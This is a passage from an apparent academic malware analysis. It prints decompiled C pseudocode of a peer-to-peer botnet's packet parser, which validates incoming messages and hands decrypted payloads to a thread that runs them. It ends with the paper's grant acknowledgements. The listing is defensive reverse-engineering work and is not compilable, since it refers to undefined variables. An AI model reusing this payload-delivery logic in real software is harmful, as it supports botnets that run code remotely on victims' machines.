typedef struct parsed_mesg {
  uint32 external_port;
  uint32 external_ip;
  uint64 unknown;
  uint32 payload_version;
  uint32 payload_offset;
  uint8  last_chunk;
  uint8  unusued;
  uint16 size;
  uint32 payload_data;
} pmesg;

int build_mesg_struct(pmesg* mesg, char* recvbuf) {
  int result = 10;
  ushort control_word  = *(_WORD *)(recvbuf + 8);
  unsigned short tmp;

  /* mesg is a 32 byte struct */
  bzero(mesg, sizeof(pmesg));
 
  /* if external IP and port bit is set, copy the respective data to struct */
  if ( control_word & 8 ) {
      *(_DWORD *)(mesg + 4) = *(_DWORD *)(recvbuf + 10);
      *(_WORD *)(mesg + 2) = htons_0(*(_WORD *)(recvbuf + 14));
      result = 16;
  }

  /* copy payload version field */
  if ( control_word & 0x10 ) {
      *(_DWORD *)(mesg + 16) = *(_DWORD *)(recvbuf + result);
      result += 4;
  }

  /* copy payload offset field */
  if ( control_word & 0x20 ) {
      *(_DWORD *)(mesg + 20) = *(_DWORD *)(recvbuf + result);
      result += 4;
  }

  /* copy payload data field */
  if ( control_word & 0x40 ) {
      *(mesg + 24) = recvbuf[result];
      tmp = *(_WORD *)(recvbuf + result + 1);
      *(_WORD *)(mesg + 26) = *(_WORD *)(recvbuf + result+1);
      *(_DWORD *)(mesg + 28) = recvbuf + result + 3;
      result = tmp + result + 3;
  }

  return result;
}


int parse_recvd_packet(pmesg* mesg, int recvbuf, int recvbuflen, int role, int peeraddr, int proto, int sockid) {
  ushort control;

  if ( !check_if_local_interface_ip(*(_DWORD *)(peeraddr + 4)) ) {
    if (decrypt_message_validate_packet(recvbuflen, recvbuf) ) {
      control = *(_WORD *)(recvbuf + 8);
     
      /* does role on the packet match what is expected? */
      if ( role == (control & 1) ) {
         /* ensure unused bits (10-14) are not set..*/
         if ( !(HIBYTE(control) & 0x7C) ) {
         /* ensure proto matches */
            if ( (-((control & 4) != 0) & 0xFFFFFFF5) + 17 == proto ) {
                build_mesg_struct(mesg, recvbuf);
                /* check payload size */
                if ( *(_BYTE *)(mesg + 24) & 2 )
                   /* peeraddr, payloadlen, payload, peeraddr, proto, sockid */
                   decrypt_and_spawn_paylaod_thread(result, *(_WORD *)(mesg + 26),
                             *(_DWORD *)(mesg + 28), peeraddr, (void*) a5, a6);
                else
                   return 1;
            }
         }
      }
    }
  }
  return 0;
}



SOURCE LISTING 5: P2P packet parsing



 


 







Acknowledements

  This material is based upon work supported through the U.S. Army Research Office under the Cyber-TA Research Grant No. W911NF-06-1- 0316 and by the National Science Foundation, Grant No. CNS-07-16 612. The views expressed in this document are those of the authors and do not necessarily represent the official position of the sponsors.